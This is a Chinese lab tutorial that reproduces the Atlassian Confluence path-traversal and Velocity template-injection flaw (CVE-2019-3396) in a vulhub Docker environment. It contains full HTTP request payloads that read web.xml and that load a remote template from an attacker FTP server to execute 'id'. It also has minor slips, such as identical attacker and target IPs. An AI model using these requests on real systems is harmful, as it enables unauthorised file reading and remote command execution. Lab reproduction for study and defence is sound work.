完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

2023-10-19 17:10
文章标签 流程 路径 命令 漏洞 执行 2019 复现 cve 完整 confluence 穿越 atlassian 3396

本文主要是介绍完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

搭建环境之前,最好将虚拟机的内存调至4G

靶机ip:192.168.187.130,os:centos7

攻击主机:ip:192.168.187.130, os:kali2019,工具:burpsuite

 

(一)安装pip,docker环境

由于docker-compose需要pip来安装,首先要安装pip环境

 

1.安装docker

用root账户登陆linux,我这里用的centos7,其他的linux系统也可以

然后执行

curl -s https://get.docker.com/ | sh

然后执行docker -v查看docker是否安装成功

 

2.安装pip

curl -s https://bootstrap.pypa.io/get-pip.py|python

可以看到成功安装了两个工具,这里再检查一下有没有安装setuptools工具

执行pip install setuptools

检查pip版本pip -V

 

3. pip安装docker-compose

这里可能会遇到很多报错,参考https://www.cnblogs.com/felixqiang/p/11946644.html解决

当出现这个时,意味着docker-compose成功安装

docker-compose -v查看版本号

 

4.克隆vulhub的github库

yum install git,首先安装git

git clone https://github.com/vulhub/vulhub,克隆vulhub库,可以下载可能会比较慢

到这里结束建议保存快照,每次做完一个漏洞复现就可以恢复快照从而恢复环境

或者输入docker-compose down移除环境

 

(二)启动环境

1.启动docker环境

cd vulhub/confluence/CVE-2019-3396/,进入CVE-2019-3396目录

systemctl start docker,启动docker

systemctl status docker,检查docker是否在运行

docker-compose build && docker-compose up -d,启动漏洞环境

这里搭建时间会很久,可以搞一个加速器

sudo vi /etc/docker/daemon.json

请在该配置文件中加入(没有该文件的话,请先建一个):

{"registry-mirrors": ["http://hub-mirror.c.163.com"]
}

出现这个说明启动成功了

再看一下8090端口是否启动

 

2.启动Confluence环境

在当前linux系统访问http://localhost:8090/,选择Trial Installation

这里会要求填写license key,先不要着急,点击Get an evaluation license,获取一个临时证书

之后他会让你注册一个账户,按要求注册即可,不需要个人信息,也不需要花钱,注册好后登陆

会来的申请证书的界面,按图示操作即可(不要选择Data Center和Addons)

然后进入License,选择一个证书

复制License Key

粘贴到之前这个页面的Confluence框,如果找不到这个页面就在地址栏输入localhost:8090

然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。这里千万不要中断。

如果提示填写cluster node,路径填写/home/confluence即可。

后续可能要求你填写数据库账号密码,选择postgres数据库,地址为db,账号密码均为postgres

 至此靶机环境已经搭建完成

 

(四)漏洞复现

Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。

我在kali上打开burpsuite,选择Repeater,输入如下文本,把localhost替换成靶机的ip地址,如果攻击主机和靶机是同一台机器则不用

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

点击GO执行,拿到账户文件

抓取web.xml,将localhost替换为靶机ip,如果攻击主机和靶机是同一台机器则不用,burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 172{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

 拿到web.xml

 

6.12以前的Confluence没有限制文件读取的协议和路径,我们可以使用file:///etc/passwd来读取文件,也可以通过https://...来加载远程文件(在攻击主机上完成该步骤)

git clone https://github.com/Yt1g3r/CVE-2019-3396_EXP.git    //先下载EXP

然后用python搭建一个临时的ftp服务器

pip install pyftpdlib

cd CVE-2019-3396_EXP     //进入这个目录

python -m pyftpdlib -p 21    //启动FTP服务

将localhost替换为靶机ip,ip:port替换为攻击主机ip和21端口如果攻击主机和靶机是同一台机器则不用,在burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 198{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://ip:port/cmd.vm","cmd":"id"}}}

拿到uid

至此,漏洞复现完成。

 

可以参考Vulhub官方的复现教程

https://vulhub.org/#/environments/confluence/CVE-2019-3396/

参考文献:https://blog.csdn.net/jiangbuliu/article/details/94016753

                  http://www.ywnxs.com/1461.html

 

这篇关于完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/241200

相关文章

nginx启动命令和默认配置文件的使用

nginx启动命令和默认配置文件的使用

《nginx启动命令和默认配置文件的使用》:本文主要介绍nginx启动命令和默认配置文件的使用,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录常见命令nginx.conf配置文件location匹配规则图片服务器总结常见命令# 默认配置文件启动./nginx
阅读更多...
SpringBoot整合Flowable实现工作流的详细流程

SpringBoot整合Flowable实现工作流的详细流程

《SpringBoot整合Flowable实现工作流的详细流程》Flowable是一个使用Java编写的轻量级业务流程引擎,Flowable流程引擎可用于部署BPMN2.0流程定义,创建这些流程定义的... 目录1、流程引擎介绍2、创建项目3、画流程图4、开发接口4.1 Java 类梳理4.2 查看流程图4
阅读更多...
SpringBoot项目配置logback-spring.xml屏蔽特定路径的日志

SpringBoot项目配置logback-spring.xml屏蔽特定路径的日志

《SpringBoot项目配置logback-spring.xml屏蔽特定路径的日志》在SpringBoot项目中,使用logback-spring.xml配置屏蔽特定路径的日志有两种常用方式,文中的... 目录方案一:基础配置(直接关闭目标路径日志)方案二:结合 Spring Profile 按环境屏蔽关
阅读更多...
基于Python实现一个Windows Tree命令工具

基于Python实现一个Windows Tree命令工具

《基于Python实现一个WindowsTree命令工具》今天想要在Windows平台的CMD命令终端窗口中使用像Linux下的tree命令,打印一下目录结构层级树,然而还真有tree命令,但是发现... 目录引言实现代码使用说明可用选项示例用法功能特点添加到环境变量方法一:创建批处理文件并添加到PATH1
阅读更多...
java Long 与long之间的转换流程

java Long 与long之间的转换流程

《javaLong与long之间的转换流程》Long类提供了一些方法,用于在long和其他数据类型(如String)之间进行转换,本文将详细介绍如何在Java中实现Long和long之间的转换,感... 目录概述流程步骤1:将long转换为Long对象步骤2:将Longhttp://www.cppcns.c
阅读更多...
java对接海康摄像头的完整步骤记录

java对接海康摄像头的完整步骤记录

《java对接海康摄像头的完整步骤记录》在Java中调用海康威视摄像头通常需要使用海康威视提供的SDK,下面这篇文章主要给大家介绍了关于java对接海康摄像头的完整步骤,文中通过代码介绍的非常详细,需... 目录一、开发环境准备二、实现Java调用设备接口(一)加载动态链接库(二)结构体、接口重定义1.类型
阅读更多...
SpringBoot3中使用虚拟线程的完整步骤

SpringBoot3中使用虚拟线程的完整步骤

《SpringBoot3中使用虚拟线程的完整步骤》在SpringBoot3中使用Java21+的虚拟线程(VirtualThreads)可以显著提升I/O密集型应用的并发能力,这篇文章为大家介绍了详细... 目录1. 环境准备2. 配置虚拟线程方式一:全局启用虚拟线程(Tomcat/Jetty)方式二:异步
阅读更多...
Python远程控制MySQL的完整指南

Python远程控制MySQL的完整指南

《Python远程控制MySQL的完整指南》MySQL是最流行的关系型数据库之一,Python通过多种方式可以与MySQL进行交互,下面小编就为大家详细介绍一下Python操作MySQL的常用方法和最... 目录1. 准备工作2. 连接mysql数据库使用mysql-connector使用PyMySQL3.
阅读更多...
Linux中修改Apache HTTP Server(httpd)默认端口的完整指南

Linux中修改Apache HTTP Server(httpd)默认端口的完整指南

《Linux中修改ApacheHTTPServer(httpd)默认端口的完整指南》ApacheHTTPServer(简称httpd)是Linux系统中最常用的Web服务器之一,本文将详细介绍如何... 目录一、修改 httpd 默认端口的步骤1. 查找 httpd 配置文件路径2. 编辑配置文件3. 保存
阅读更多...
Java -jar命令如何运行外部依赖JAR包

Java -jar命令如何运行外部依赖JAR包

《Java-jar命令如何运行外部依赖JAR包》在Java应用部署中,java-jar命令是启动可执行JAR包的标准方式,但当应用需要依赖外部JAR文件时,直接使用java-jar会面临类加载困... 目录引言:外部依赖JAR的必要性一、问题本质:类加载机制的限制1. Java -jar的默认行为2. 类加
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2